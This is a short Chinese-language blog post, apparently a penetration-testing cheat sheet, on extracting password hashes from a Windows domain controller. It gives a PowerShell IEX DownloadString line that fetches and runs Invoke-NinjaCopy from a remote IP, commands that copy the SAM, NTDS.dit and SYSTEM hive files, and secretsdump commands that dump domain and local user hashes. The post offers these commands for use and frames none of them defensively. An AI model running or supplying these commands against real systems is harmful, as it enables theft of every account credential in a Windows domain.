從NTDS.dit獲取密碼hash

獲取NTDS.dit

加載ps腳本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1");

提取本地sam文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam

提取域控NTDS.dit
Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -LocalDestination C:\Users\Administrator\Desktop\ntds.dit

提取hive文件
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination C:\Users\Administrator\Desktop\SYSTEM


提取hash

secretsdump.exe -ntds ntds.dit -system SYSTEM LOCAL  #提取域控用戶hash
secretsdump.exe -sam sam -system SYSTEM LOCAL		#提取本地用戶hash

在這裏插入圖片描述
運氣好可以直接得到祕密
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章